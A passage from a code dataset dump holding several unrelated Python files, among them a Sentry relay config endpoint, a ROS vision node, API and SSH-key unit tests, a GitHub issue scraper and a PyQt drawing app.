(RelayPermission,)\n\n def post(self, request):\n 
relay = request.relay\n assert relay is not None\n full_config_requested = request.relay_request_data.get('fullConfig')\n if full_config_requested and not relay.is_internal:\n return Response('Relay unauthorized for full config information', 403)\n else:\n project_ids = request.relay_request_data.get('projects') or ()\n projects = {}\n orgs = set()\n if project_ids:\n for project in Project.objects.filter(pk__in=project_ids):\n proj_config = config.get_project_config(project.id, relay.is_internal and full_config_requested)\n projects[six.text_type(project.id)] = proj_config\n orgs.add(project.organization_id)\n\n if orgs:\n orgs = {o.id:o for o in Organization.objects.filter(pk__in=orgs)}\n for cfg in list(projects.values()):\n org = orgs.get(cfg.project.organization_id)\n if org is None or not request.relay.has_org_access(org):\n projects.pop(six.text_type(cfg.project.id))\n\n configs = {p_id:cfg.to_camel_case_dict() for p_id, cfg in six.iteritems(projects)}\n for project_id in project_ids:\n configs.setdefault(six.text_type(project_id), None)\n\n return Response({'configs': configs}, status=200)","sub_path":"pycfiles/sentry-10.0.0-py27-none-any/relay_projectconfigs.py","file_name":"relay_projectconfigs.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"335900523","text":"#!/usr/bin/env python3\n\nimport roslib\nimport sys\nimport rospy\nimport cv2\nimport numpy as np\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import Image\nfrom std_msgs.msg import Float64MultiArray, Float64\nfrom cv_bridge import CvBridge, CvBridgeError\nfrom ivr_vision import ivr_vision, camera\nfrom Link1Estimator import Link1Estimator\nfrom forward_kinematics import robot\nfrom sensor_msgs.msg import JointState\nfrom copy import copy\nimport matplotlib.pyplot as plt\n\nclass image_converter:\n def __init__(self):\n self.test()\n rospy.init_node('image_processing', anonymous=True)\n self.image_pub1 = rospy.Publisher(\"image_topic1\",Image, queue_size = 1)\n self.bridge = CvBridge()\n self._cam2_joint_locations_2d = np.repeat(None, 2 * 4).reshape(4, -1)\n self._joint_locations_2d = np.repeat(None, 2 * 4).reshape(4, -1)\n self._prev_angles = None\n self._joint_angles = np.array([0.0, 0.0, 0.0, 0.0])\n # comms\n self.image_sub1 = rospy.Subscriber(\"/camera1/robot/image_raw\",Image,self.callback1)\n self.joint1_controller = rospy.Publisher(\"/robot/joint1_position_controller/command\", Float64, queue_size=3)\n self.joint2_controller = rospy.Publisher(\"/robot/joint2_position_controller/command\", Float64, queue_size=3)\n self.joint3_controller = rospy.Publisher(\"/robot/joint3_position_controller/command\", Float64, queue_size=3)\n self.joint4_controller = rospy.Publisher(\"/robot/joint4_position_controller/command\", Float64, queue_size=3)\n self.joint_angles_pub = rospy.Publisher(\"/robot/all_joints_estimate\", Float64MultiArray, queue_size=3)\n self.cam2_joint1_location_2d_sub = rospy.Subscriber(\"/camera2/joint1_location_2d\",Float64MultiArray,self.joint_locations_callback1)\n self.cam2_joint2_location_2d_sub = rospy.Subscriber(\"/camera2/joint2_location_2d\",Float64MultiArray,self.joint_locations_callback2)\n self.cam2_joint3_location_2d_sub = rospy.Subscriber(\"/camera2/joint3_location_2d\",Float64MultiArray,self.joint_locations_callback3)\n self.cam2_joint4_location_2d_sub = rospy.Subscriber(\"/camera2/joint4_location_2d\",Float64MultiArray,self.joint_locations_callback4)\n\n def test(self):\n X = 
np.array([\n [[0, 0, 0], [0, 0, 2.5], [0, 0, 6] , [0, 0, 9]],\n [[0, 0, 0], [0, 0, 2.5], [0, 3.5, 2.5] , [0, 6, 2.5]],\n [[0, 0, 0], [0, 0, 2.5], [-1.75, -1.52, 5.12], [-2.81, -0.60, 7.78]],\n [[0, 0, 0], [0, 0, 2.5], [-2.31, .166, 5.13] , [-2.41, 1.56, 7.78]]\n ])\n Y = np.array([\n [0, 0, 0, 0],\n [0, 0, np.pi / 2, 0],\n [0 , np.pi / 6, -np.pi / 6, -np.pi / 4],\n [-np.pi / 4, np.pi / 6, -np.pi / 6, -np.pi / 4]\n ])\n errors = []\n predictions = []\n prev_estimate = -np.pi\n for theta1_truth in np.linspace(-np.pi, np.pi, num=30):\n angles = np.array([theta1_truth, np.pi / 6, -np.pi / 6, -np.pi / 4])\n # angles = np.array([theta1_truth, 0, 0, 1.3])\n _mat_1 = ivr_vision._transform(theta=np.pi/2, a=0.0, d=2.5, alpha=np.pi/2 , angle=angles[0])\n _mat_2 = ivr_vision._transform(theta=np.pi/2, a=0.0, d=0.0, alpha=np.pi/2 , angle=angles[1])\n _mat_3 = ivr_vision._transform(theta=0.0 , a=3.5, d=0.0, alpha=-np.pi/2, angle=angles[2])\n _mat_4 = ivr_vision._transform(theta=0.0 , a=3.0, d=0.0, alpha=0.0 , angle=angles[3])\n fk_joint_locs = np.array([\n [0.0, 0.0, 0.0],\n (_mat_1)[:-1, -1],\n (_mat_1 @ _mat_2 @ _mat_3)[:-1, -1],\n (_mat_1 @ _mat_2 @ _mat_3 @ _mat_4)[:-1, -1]\n ])\n estimated_angles, error = ivr_vision.fit_theta1(fk_joint_locs, prev_estimate)\n predictions.append([theta1_truth, estimated_angles[0]])\n errors.append([theta1_truth, error])\n prev_estimate = estimated_angles[0]\n predictions = np.array(predictions)\n errors = np.array(errors)\n plt.plot(predictions[:,0], predictions[:,1], c='gray')\n plt.xlabel(r'$\\theta_1$')\n plt.xticks([-np.pi, np.pi], [r'$-\\pi$', r'$\\pi$'])\n plt.ylabel(r'$\\hat{\\theta_1}$')\n plt.yticks([-np.pi, np.pi], [r'$-\\pi$', r'$\\pi$'])\n plt.title(r'$\\hat{\\theta_1}$ as a function of $\\theta_1$')\n plt.show()\n\n def joint_locations_callback1(self, data):\n self._cam2_joint_locations_2d[0] = np.array(data.data)\n self._joint_locations_callback(data)\n\n def joint_locations_callback2(self, data):\n self._cam2_joint_locations_2d[1] = np.array(data.data)\n self._joint_locations_callback(data)\n\n def joint_locations_callback3(self, data):\n self._cam2_joint_locations_2d[2] = np.array(data.data)\n self._joint_locations_callback(data)\n\n def joint_locations_callback4(self, data):\n self._cam2_joint_locations_2d[3] = np.array(data.data)\n self._joint_locations_callback(data)\n\n def _joint_locations_callback(self, data):\n if self._joint_locations_2d is None or None in self._cam2_joint_locations_2d:\n return\n Js = ivr_vision.combine_joint_locations(self._joint_locations_2d, self._cam2_joint_locations_2d)\n\n self._joint_angles, error = ivr_vision.fit_theta1(Js, self._joint_angles[0])\n\n self.joint_angles_pub.publish(Float64MultiArray(data=self._joint_angles))\n if (self._prev_angles is None or np.linalg.norm(self._prev_angles - self._joint_angles) > 0.2):\n print(f'angles: {self._joint_angles}')\n self._prev_angles = self._joint_angles\n\n def callback1(self,data):\n try:\n self.cv_image1 = self.bridge.imgmsg_to_cv2(data, \"bgr8\")\n except CvBridgeError as e:\n print(e)\n ivr_vision.update_joint_locations(self.cv_image1, self._joint_locations_2d)\n im1=cv2.imshow('window1', self.cv_image1)\n cv2.waitKey(1)\n try:\n self.image_pub1.publish(self.bridge.cv2_to_imgmsg(self.cv_image1, \"bgr8\"))\n except CvBridgeError as e:\n print(e)\n\n time = rospy.get_time()\n # self._update_joint1(time)\n # self._update_joint2(time)\n # self._update_joint3(time)\n # self._update_joint4(time)\n\n def _update_joint1(self, t):\n new_state = np.pi * np.sin(np.pi / 15.0 * 
t)\n self.joint1_controller.publish(new_state)\n\n def _update_joint2(self, t):\n new_state = np.pi / 2.0 * np.sin(np.pi / 15.0 * t)\n self.joint2_controller.publish(new_state)\n\n def _update_joint3(self, t):\n new_state = np.pi / 2.0 * np.sin(np.pi / 18.0 * t)\n self.joint3_controller.publish(new_state)\n\n def _update_joint4(self, t):\n new_state = np.pi / 2.0 * np.sin(np.pi / 20.0 * t)\n self.joint4_controller.publish(new_state)\n\ndef main(args):\n ic = image_converter()\n try:\n rospy.spin()\n except KeyboardInterrupt:\n print(\"Shutting down\")\n cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n main(sys.argv)\n","sub_path":"src/task_4_1.py","file_name":"task_4_1.py","file_ext":"py","file_size_in_byte":6644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"637290954","text":"# -*- coding:utf-8 -*-\n'''\n#文件名:\n#作者:张利娟\n#创建日期:2018/1/17\n#模块描述:\n#历史修改记录\n#修改人:\n#修改日期:\n#修改内容:\n'''\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\n# 导入驱动\nsys.path.append(\"/testIsomp/common/\")\nfrom _initDriver import initDriver\nsys.path.append(\"/testIsomp/testCase/mount/\")\nfrom test_mount import testMount\nsys.path.append(\"/testIsomp/testSuite/common_suite_file/\")\nfrom common_suite_file import setDriver, CommonSuiteData\nimport unittest\n\nclass testMountSuit(unittest.TestCase):\n\tdef setUp(self):\n\t\tself.browser = setDriver().set_driver()\n\t\tself.comsuit = CommonSuiteData(self.browser)\n\t\tself.testmount = testMount(self.browser)\n\n\t\t#前置条件\n\t\tself.comsuit.audit_mount_module_prefix_condition()\n\n\tdef test_audit_mount(self):\n\t\t#添加审计存储扩展\n\t\tself.testmount.add_mount_001()\n\t\t#审计存储扩展校验\n\t\tself.testmount.check_mount_002()\n\n\t#后置条件\n\tdef tearDown(self):\n\t\tself.comsuit.audit_mount_module_post_condition()\n\t\tinitDriver().close_driver(self.browser)\n\nif __name__ == \"__main__\":\n\tunittest.main()\n\n","sub_path":"testSuite/test_027_audit_mount_suit.py","file_name":"test_027_audit_mount_suit.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"71881143","text":"'''\nCreated on 17/04/2014\n\n:author: alfred\n'''\nimport os\nimport json\nfrom uuid import uuid4\nfrom unittest.case import TestCase\nfrom tests import BaseTestCase, mock_session_org_type\n\n\nclass DeviceGroupViewTest(BaseTestCase, TestCase):\n\n @mock_session_org_type('customer')\n def test_list(self):\n response = self.client.get(\"/dmm/c23456789012345678901234/device-group\")\n self.assert200(response)\n\n data = response.json\n\n self.assertEqual(len(data), 1, str(data))\n self.assertTrue('deviceGroups' in data, \"deviceGroups key in \" + str(data))\n sc = data['deviceGroups']\n self.assertEqual(len(sc), 2, str(sc))\n self.assertTrue('items' in sc, \"items key in \" + str(sc))\n self.assertTrue('count' in sc, \"count key in \" + str(sc))\n\n @mock_session_org_type('customer')\n def test_list_with_watchers(self):\n response = self.client.get(\"/dmm/c23456789012345678901234/device-group?_watchers=1\")\n self.assert200(response)\n\n data = response.json\n\n self.assertEqual(len(data), 2, str(data))\n self.assertTrue('deviceGroups' in data, \"deviceGroups key in \" + str(data))\n sc = data['deviceGroups']\n self.assertEqual(len(sc), 2, str(sc))\n self.assertTrue('items' in sc, \"items key in \" + str(sc))\n self.assertTrue('count' in sc, \"count key in \" + str(sc))\n\n self.assertTrue('watchers' in data, \"watchers key in \" + str(data))\n sc = 
data['watchers']\n self.assertEqual(len(sc), 2, str(sc))\n self.assertTrue('items' in sc, \"items key in \" + str(sc))\n self.assertTrue('count' in sc, \"count key in \" + str(sc))\n\n @mock_session_org_type('customer')\n def test_create_upload_not_found(self):\n response = self.client.post(\"/dmm/c23456789012345678901234/device-group/\",\n data='{\"name\": \"foobar\", \"uploadId\": \"222323232323232323\"}')\n self.assert400(response)\n\n data = response.json\n\n self.assertEqual(data, {'message': 'Model does not pass validations',\n 'exception': {\n 'class': 'ValidateError',\n 'code': '400',\n 'message': 'Model does not pass validations'\n },\n 'error': '400',\n 'validationErrors':\n {'uploadId': {'notFound': \"Item '222323232323232323' not found\"}}},\n str(data))\n\n @mock_session_org_type('customer')\n def test_create_upload(self):\n response = self.client.post(\"/core/upload/\")\n self.assert200(response)\n\n data = response.json\n\n self.assertEqual(len(data), 1, str(data))\n\n self.assertTrue('upload' in data, \"upload key in \" + str(data))\n data = data['upload']\n\n self.assertTrue('id' in data, \"id key in \" + str(data))\n\n id = data['id']\n\n filename = os.path.join(os.path.dirname(os.path.abspath(__file__)),\n 'data', 'test_1.csv')\n\n with open(filename, 'rb') as test_file:\n response = self.client.post(\"/core/upload/{}\".format(id), buffered=True,\n content_type='multipart/form-data',\n data={'data': '',\n 'file_field': test_file})\n self.assert200(response)\n\n data = {'name': str(uuid4())[:32],\n 'uploadId': id}\n\n response = self.client.post(\"/dmm/c23456789012345678901234/device-group/\",\n data=json.dumps(data))\n self.assert200(response)\n\n data = response.json\n\n self.assertIn('id', data, str(data))\n self.assertIn('watcher', data, str(data))\n","sub_path":"mc-pybe-release-smip-R4/tests/blueprints/dmm/device_group/tests_views.py","file_name":"tests_views.py","file_ext":"py","file_size_in_byte":3895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"494501906","text":"import numpy as np\r\nfrom statsmodels.formula.api import ols\r\nfrom statsmodels.stats.anova import anova_lm\r\nimport pandas as pd\r\nfrom scipy.interpolate import pchip_interpolate\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.manifold import TSNE\r\nimport scipy.io as sio\r\nmatplotlib.use('Agg')\r\nMODE_LIST = ['min-rpe','max-rpe','min-spe','max-spe','min-rpe-min-spe','max-rpe-max-spe','min-rpe-max-spe','max-rpe-min-spe']\r\nMODE_MAP = {\r\n 'min-spe' : ['spe', None, 'red', 'MIN_SPE'],\r\n 'max-spe' : ['spe', None, 'mediumseagreen', 'MAX_SPE'],\r\n 'min-rpe' : ['rpe', None, 'royalblue', 'MIN_RPE'],\r\n 'max-rpe' : ['rpe', None, 'plum', 'MAX_RPE'],\r\n 'min-rpe-min-spe' : ['spe', 'rpe', 'tomato', 'MIN_RPE_MIN_SPE'],\r\n 'max-rpe-max-spe' : ['spe', 'rpe', 'dodgerblue', 'MAX_RPE_MAX_SPE'],\r\n 'max-rpe-min-spe' : ['spe', 'rpe', 'y', 'MAX_RPE_MIN_SPE'],\r\n 'min-rpe-max-spe' : ['spe', 'rpe', 'mediumvioletred', 'MIN_RPE_MAX_SPE']\r\n}\r\nVAR_MAP_LIST = ['PMB','SPE', 'RPE','RWD','SCR']\r\nfolderpath = '20210827'\r\nfile_suffix = '_2020_20_trials_delta_control_highest'\r\nmax_sbj = 82\r\n#file_suffix = '_2020_delta_trials_control_highest'\r\n#file_suffix = '_2019_delta_trials_control_highest'\r\n# if file_suffix == '_2020_delta_trials_control' or file_suffix == '_2020_20_trials_delta_control_highest':\r\n# MODE_LIST = ['min-rpe', 'max-rpe']\r\nmode_idf = 2 #2-min 3-max\r\ndo_anova = False\r\nvar_idf = 0\r\nCONTROL_resting 
= 99\r\n\r\nFBA=np.load('FBA.npy')\r\nFBA_lb = np.zeros(max_sbj)\r\nfor ii in range(max_sbj):\r\n #if FBA[ii] div > div > a')\n\t\tb=soup.select('span.opened-by')\n\t\tc=soup.select('relative-time')\n\t\ttest=soup.select('div.float-left.col-9.lh-condensed.p-2')\n\t\t#hostsfile = open('record.txt', 'w', newline='',encoding='UTF-8')\n\t\tfor i in range(0,len(b)):\n\t\t\ttemp=[]\n\t\t\ttemp.append(a[i].get_text()) #标题\n\t\t\ttemp.append(\"closed\") #状态\n\t\t\ttemp.append(c[i].attrs['datetime']) #问题提出时间\n\t\t\tz=\"\"\n\t\t\tfor j in test[i].select('a.d-inline-block.IssueLabel.v-align-text-top'):\n\t\t\t\tz+=j.get_text()+'/'\n\t\t\ttemp.append(z) #标签\n\t\t\t#sn=b[i].get_text().replace(\" \",\"\").split('\\n')[1].replace(\"#\",\"\").replace(\"\\n\",\"\")\n\t\t\tm = re.search('\\d+',b[i].get_text())\n\t\t\tn=m.group(0)\n\t\t\ttemp.append(m.group(0)) #任务ID\n\t\t\ts,t=getdata(m.group(0))\n\t\t\t#s=getdata(m.group(0))\n\t\t\ttemp.append(t) #任务关闭时间\n\t\t\tfor i in s:\n\t\t\t\ttemp.append(i)\n\t\t\t#temp.append(s)\n\t\t\twrite07Excel(\"closed.xlsx\",temp)\n\t\t\t#record.append(temp)\n\t\t#hostsfile.close()\n\t\tprint('hosts刷新成功:',len(a))\n\texcept Exception as err:\n\t\tprint(str(err))\n\ndef getdata(sn):\n\ttemp=[]\n\ttry:\n\t\turl=\"https://github.com/tensorflow/tensorflow/issues/\"+str(sn)\n\t\tdata = urllib.request.urlopen(url).read()\n\t\tz_data = data.decode('UTF-8')\n\t\tsoup = BeautifulSoup(z_data, 'lxml')\n\t\ta = soup.select('task-lists table > tbody > tr > td.d-block.comment-body.markdown-body.js-comment-body')\n\t\tb = soup.select('div.discussion-item.discussion-item-closed')\n\t\tauthor=soup.find_all('h3',attrs={'class':'timeline-comment-header-text f5 text-normal'})\n\t\t#print(sn,len(a),len(author))\n\t\ttemp.append(len(a)-1) #评论数\n\t\ttemp.append(author[0].select('a.author')[0].get_text()) #问题提出者\n\t\tif len(b[0].select('a.author'))>0:\n\t\t\ttemp.append(b[0].select('a.author')[0].get_text()) #问题关闭者\n\t\telse:\n\t\t\ttemp.append(\"\")\n\t\ttemp.append(a[0].get_text())\n\t\tfor i in range(1,len(a)):\n\t\t\ttempd=[]\n\t\t\ttempd.append(sn) #问题id\n\t\t\ttempd.append(author[i].select('a.author')[0].get_text()) #评论人id\n\t\t\ttempd.append(author[i].select('relative-time')[0].attrs['datetime']) #评论时间\n\t\t\ttempd.append(a[i].get_text()) #评论内容 #评论内容\n\t\t\twrite07Excel(\"closed_comment.xlsx\",tempd)\n\texcept Exception as err:\n\t\tprint(str(err))\n\t\t#pass\n\tif len(b[0].select('relative-time'))>0:\n\t\treturn temp,b[0].select('relative-time')[0].attrs['datetime']\n\telse:\n\t\treturn temp,\"\"\n\n'''\ndef write07Excel(path,value,row):\n wb = openpyxl.Workbook()\n sheet = wb.active\n sheet.title = 'Sheet1'\n for i in range(0, len(value)):\n for j in range(0, len(value[i])):\n sheet.cell(row=i+1, column=j+1, value=str(value[i][j]))\n wb.save(path)\n'''\n\nif __name__==\"__main__\":\n\t#for i in range(37,146):\n\ttry:\n\t\tgettitle(float(P))\n\t\tprint(\"第\"+str(P)+\"页完成\")\n\texcept Exception as err:\n\t\thostsfile = open('comments.txt', 'w', newline='')\n\t\thostsfile.write(str(P)+\":\"+str(err) + \"\\n\")\n\t\thostsfile.close()\n\t\t\t#print(\"第\"+str(i)+\"页抓取失败\")\n\t#write07Excel(\"closed.xlsx\",record)","sub_path":"CrawlComments/closed.py","file_name":"closed.py","file_ext":"py","file_size_in_byte":4274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"567978455","text":"from pandas import DataFrame\n\nfrom weaverbird.backends.pandas_executor.steps.cumsum import execute_cumsum\nfrom weaverbird.pipeline.steps import 
CumSumStep\n\n\ndef test_benchmark_cumsum(benchmark):\n big_df = DataFrame({'value': list(range(1000))})\n step = CumSumStep(\n name='cumsum',\n referenceColumn='value',\n valueColumn='value',\n newColumn='my_cumsum',\n )\n benchmark(execute_cumsum, step, big_df)\n","sub_path":"server/tests/steps/test_cumsum.py","file_name":"test_cumsum.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"166680528","text":"import unittest\nfrom unittest.mock import patch, mock_open, MagicMock, call\n\nfrom hypothesis import given, example\nfrom hypothesis.strategies import text, integers, sampled_from\n\nfrom aws_gate.constants import DEFAULT_GATE_KEY_PATH\nfrom aws_gate.ssh_common import SshKey, SUPPORTED_KEY_TYPES, KEY_MIN_SIZE, SshKeyUploader\n\n\nclass TestSSHCommon(unittest.TestCase):\n def setUp(self):\n self.ssh_key = MagicMock()\n self.ssh_key.configure_mock(**{\n 'public_key.return_value': 'ssh-rsa ranodombase64string'\n })\n\n @given(sampled_from(SUPPORTED_KEY_TYPES), integers(min_value=KEY_MIN_SIZE))\n def test_initialize_key(self, key_type, key_size):\n key = SshKey(key_type=key_type)\n\n self.assertTrue(key.key_path, DEFAULT_GATE_KEY_PATH)\n self.assertTrue(key.key_type, key_type)\n self.assertTrue(key.key_size, key_size)\n\n @given(sampled_from(SUPPORTED_KEY_TYPES))\n def test_ssh_public_key(self, key_type):\n key = SshKey(key_type=key_type)\n key.generate()\n\n if key_type == 'rsa':\n key_start_str = 'ssh-rsa'\n else:\n key_start_str = 'ssh-ed25519'\n\n self.assertTrue(key.public_key.decode().startswith(key_start_str))\n\n @given(text())\n def test_initialize_key_unsupported_key_type(self, key_type):\n with self.assertRaises(ValueError):\n SshKey(key_type=key_type)\n\n @given(integers(max_value=KEY_MIN_SIZE))\n @example(0)\n @example(-1024)\n def test_initialize_key_unsupported_key_size(self, key_size):\n with self.assertRaises(ValueError):\n SshKey(key_size=key_size)\n\n def test_initialize_key_invalid_key_path(self):\n with self.assertRaises(ValueError):\n SshKey(key_path='')\n\n @given(sampled_from(SUPPORTED_KEY_TYPES))\n def test_initialize_key_as_context_manager(self, key_type):\n with patch('builtins.open', new_callable=mock_open()) as open_mock, \\\n patch('aws_gate.ssh_common.os'):\n with SshKey(key_type=key_type):\n self.assertTrue(open_mock.called)\n open_mock.assert_called_with(DEFAULT_GATE_KEY_PATH, 'wb')\n\n def test_ssh_key_file_permissions(self):\n with patch('builtins.open', new_callable=mock_open()), \\\n patch('aws_gate.ssh_common.os.chmod') as m:\n key = SshKey()\n key.generate()\n key.write_to_file()\n\n self.assertTrue(m.called)\n self.assertEqual(call(DEFAULT_GATE_KEY_PATH, 0o600), m.call_args)\n\n def test_delete_key(self):\n with patch('builtins.open', new_callable=mock_open()), \\\n patch('aws_gate.ssh_common.os', new_callable=MagicMock()) as m:\n key = SshKey()\n key.generate()\n key.write_to_file()\n key.delete()\n\n self.assertTrue(m.remove.called)\n self.assertEqual(m.remove.call_args, call(DEFAULT_GATE_KEY_PATH))\n\n def test_uploader(self):\n ec2_ic_mock = MagicMock()\n\n uploader = SshKeyUploader(instance_id='i-1234567890', az='eu-west-1a', ssh_key=self.ssh_key, ec2_ic=ec2_ic_mock)\n uploader.upload()\n\n self.assertTrue(ec2_ic_mock.send_ssh_public_key.called)\n\n def test_uploader_as_context_manager(self):\n ec2_ic_mock = MagicMock()\n with SshKeyUploader(instance_id='i-1234567890', az='eu-west-1a', ssh_key=self.ssh_key, ec2_ic=ec2_ic_mock):\n 
            self.assertTrue(ec2_ic_mock.send_ssh_public_key.called)\n\n    def test_uploader_exception(self):\n        ec2_ic_mock = MagicMock()\n        ec2_ic_mock.configure_mock(**{'send_ssh_public_key.return_value': {'Success': False, 'RequestId': '12345'}})\n\n        uploader = SshKeyUploader(instance_id='i-1234567890', az='eu-west-1a', ssh_key=self.ssh_key,\n                                  ec2_ic=ec2_ic_mock)\n        with self.assertRaises(ValueError):\n            uploader.upload()\n","sub_path":"test/unit/test_ssh_common.py","file_name":"test_ssh_common.py","file_ext":"py","file_size_in_byte":3910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"243149730","text":"#!/usr/bin/env python3\n\nfrom analyzer.uninit import UninitSearch\nfrom analyzer.condition import ConditionAnalyzer\nfrom utils import *\n\n__author__ = 'vildhet'\n\n\nclass Analyzer(object):\n    def __init__(self, tree, cpp_file):\n        self.tree = tree\n        self.cpp_file = cpp_file\n\n    def find(self):\n        for func in self.tree.functions:\n            print_green_line('Function ' + func.name + ':')\n            uninit = UninitSearch(func)\n            warnings = uninit.find()\n            for warn in warnings:\n                print(warn.text, self.cpp_file + \":\", warn.line) # report against the analyzed file\n\n            cond = ConditionAnalyzer(func)\n            warnings = cond.find()\n            for warn in warnings:\n                print(warn.text, self.cpp_file + \":\", warn.line)\n\n","sub_path":"analyzer/analyzer.py","file_name":"analyzer.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"99947180","text":"from PyQt5.Qt import QWidget, QColor, QPixmap, QIcon, QSize, QCheckBox\nfrom PyQt5.QtWidgets import QHBoxLayout, QVBoxLayout, QPushButton, QSplitter,\\\n    QComboBox, QLabel, QSpinBox, QFileDialog\nfrom PaintBoard import PaintBoard\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtGui import QIcon\nimport recognition\n\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import *\nclass MainWidget(QWidget):\n\n\n    def __init__(self, Parent=None):\n        '''\n        Constructor\n        '''\n        super().__init__(Parent)\n        \n        self.__InitData() # initialize data first, then the UI\n        self.__InitView()\n        \n    def __InitData(self):\n        '''\n        Initialize member variables\n        '''\n        self.__paintBoard = PaintBoard(self)\n        self.__colorList = QColor.colorNames() # get the list of color names (as strings)\n        \n    def __InitView(self):\n        '''\n        Initialize the UI\n        '''\n        self.setFixedSize(640,480)\n        self.setWindowTitle(\"PaintBoard Example PyQt5\")\n        \n        \n        main_layout = QHBoxLayout(self) # a horizontal layout as this window's main layout\n        main_layout.setSpacing(10) # set the main layout's margins and widget spacing to 10px\n        \n        \n        main_layout.addWidget(self.__paintBoard) # place the paint board on the left of the main window\n        \n        sub_layout = QVBoxLayout() # a vertical sub-layout for the buttons\n        sub_layout.setContentsMargins(10, 10, 10, 10) # set this sub-layout's margins and inner spacing to 10px\n\n        self.__btn_Clear = QPushButton(\"Clear Board\")\n        self.__btn_Clear.setParent(self) # set the parent to this widget\n        self.__btn_Clear.clicked.connect(self.__paintBoard.Clear) # connect the click signal to the board's Clear slot\n        sub_layout.addWidget(self.__btn_Clear)\n\n        self.__label_digit = QLabel(self)\n        self.__label_digit.resize(100,30)\n        self.__label_digit.setAlignment(Qt.AlignHCenter|Qt.AlignVCenter)\n        # label1.setAutoFillBackground(True)\n        # self.__btn_Quit = QPushButton(\"Quit\")\n        # self.__btn_Quit.setParent(self) # set the parent to this widget\n        # self.__btn_Quit.clicked.connect(self.Quit)\n        sub_layout.addWidget(self.__label_digit)\n        \n        self.__btn_Save = QPushButton(\"Start Recognition\")\n        self.__btn_Save.setParent(self)\n        self.__btn_Save.clicked.connect(self.on_btn_Save_Clicked)\n        sub_layout.addWidget(self.__btn_Save)\n        \n        self.__cbtn_Eraser = QCheckBox(\" Use Eraser\")\n        self.__cbtn_Eraser.setParent(self)\n        self.__cbtn_Eraser.clicked.connect(self.on_cbtn_Eraser_clicked)\n        sub_layout.addWidget(self.__cbtn_Eraser)\n        \n        splitter = QSplitter(self) # placeholder\n        sub_layout.addWidget(splitter)\n        \n        self.__label_penThickness = QLabel(self)\n        self.__label_penThickness.setText(\"Pen Thickness\")\n        self.__label_penThickness.setFixedHeight(20)\n        sub_layout.addWidget(self.__label_penThickness)\n        \n        self.__spinBox_penThickness = QSpinBox(self)\n        self.__spinBox_penThickness.setMaximum(20)\n        self.__spinBox_penThickness.setMinimum(2)\n        self.__spinBox_penThickness.setValue(10) # default thickness is 10\n        self.__spinBox_penThickness.setSingleStep(2) # change in steps of 2\n        self.__spinBox_penThickness.valueChanged.connect(self.on_PenThicknessChange) # connect the spinbox's valueChanged signal to on_PenThicknessChange\n        sub_layout.addWidget(self.__spinBox_penThickness)\n\n        main_layout.addLayout(sub_layout) # add the sub-layout to the main layout\n\n\n    def on_PenThicknessChange(self):\n        penThickness = self.__spinBox_penThickness.value()\n        self.__paintBoard.ChangePenThickness(penThickness)\n    \n    def on_btn_Save_Clicked(self):\n        # savePath = QFileDialog.getSaveFileName(self, 'Save Your Paint', '.\\\\', '*.png')\n        # print(savePath)\n        # if savePath[0] == \"\":\n        #     print(\"Save cancel\")\n        #     return\n        image = self.__paintBoard.GetContentAsQImage()\n        image.save(\"data/digit.png\")\n        t = recognition.recognition()\n        self.digit = t.output()\n        font = QtGui.QFont()\n        # font family\n        font.setFamily('微软雅黑')\n        # bold\n        font.setBold(True)\n        # size\n        font.setPointSize(30)\n        font.setWeight(75)\n        self.__label_digit.setFont(font)\n        self.__label_digit.setText(\"<font color=%s>%s</font>\" % ('#7EC7FF', str(self.digit))) # show the digit in color using Qt rich text\n        #self.__label_digit.setText(self.digit)\n    def on_cbtn_Eraser_clicked(self):\n        if self.__cbtn_Eraser.isChecked():\n            self.__paintBoard.EraserMode = True # enter eraser mode\n        else:\n            self.__paintBoard.EraserMode = False # exit eraser mode\n    \n    \n    def Quit(self):\n        self.close()\n
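\n\n# Hedged usage sketch, not part of the original file: a minimal launcher,\n# assuming PaintBoard and recognition are importable alongside this module.\nif __name__ == \"__main__\":\n    import sys\n    app = QtWidgets.QApplication(sys.argv)\n    w = MainWidget()\n    w.show()\n    sys.exit(app.exec_())\n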
","sub_path":"MainWidget.py","file_name":"MainWidget.py","file_ext":"py","file_size_in_byte":4862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"371935488","text":"import turtle\nt=turtle.Pen()\n#\ndef triangle(length=100):\n    for i in range(3):\n        t.forward(length)\n        t.right(120)\n#\ndef square(length=100):\n    for i in range(4):\n        t.forward(length)\n        t.right(90)\n# to draw the house door\ndef rectangle(length=100):\n    t.forward(length)\n    t.right(90)\n    t.forward(length/2)\n    t.right(90)\n    t.forward(length)\n    t.right(90)\n    t.forward(length/2)\n    t.right(90)\n# position on screen so we can draw on all of it\nt.penup()\nt.backward(300)\nt.pendown()\n# how big is the house\nsize=150\n# outside house square\nt.left(90)\nsquare(size)\n# window 1 (left)\nt.penup()\nt.forward(size*0.8)\nt.right(90)\nt.forward(size*0.2)\nt.pendown()\nsquare(size*0.2)\nt.penup()\n#window 2 (right)\nt.forward(size*0.4)\nt.pendown()\nsquare(size*0.2)\nt.penup()\n# roof\nt.pencolor(\"red\")\nt.backward(size*0.6)\nt.left(90)\nt.forward(size*0.2)\nt.pendown()\nt.right(30)\ntriangle(size)\n# house 